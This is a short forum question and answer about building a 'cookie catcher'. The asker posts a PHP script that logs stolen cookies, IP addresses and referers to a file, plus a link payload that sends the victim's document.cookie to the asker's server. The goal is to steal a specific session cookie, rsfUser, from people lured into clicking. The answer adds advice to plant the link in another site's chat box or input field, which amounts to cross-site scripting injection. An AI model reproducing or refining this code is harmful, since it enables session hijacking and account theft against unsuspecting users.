# Why can't I get it to store the right cookie?

Tags: javascript, cookies

So I have tried to do a cookie catcher and managed to set up this code on my site. The problem is that the code stores a cookie from my site instead of the one I request. The cookie I need is called rsfUser and here is the code:

```
<?php
$cookie = $_GET['c'];
$date=date("j F, Y, g:i a");;
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br /> IP: '.$ip. '<br /> Date and time: ' .$date.'<br /> Referer: ' .$referer.'<br /><br />');
fclose($fp);
header ("Location: http://www.wikihow.com/Main-Page/");
?>
```

The code I am trying to make people click is:

```
<a onclick="document.location='http://example.example.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
```

The cookie stored is one from my site not the one I request. 
What am I doing wrong? How do I fix this?

Answer (score 0):

I believe you have to be directed from the site you want the cookie saved from to your site, not the other way around. Also some browsers won't let you store somebody's cookies.

You could achieve this by linking to your site inside of a chat box or input field of another site.